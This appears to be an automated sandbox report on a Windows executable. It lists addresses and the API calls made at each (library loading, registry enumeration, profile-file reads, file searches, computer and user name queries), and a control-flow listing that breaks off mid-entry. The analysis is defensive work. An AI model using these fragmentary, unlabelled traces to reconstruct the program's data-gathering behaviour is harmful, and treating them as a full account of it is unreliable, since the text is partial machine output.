                                                                                                      execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
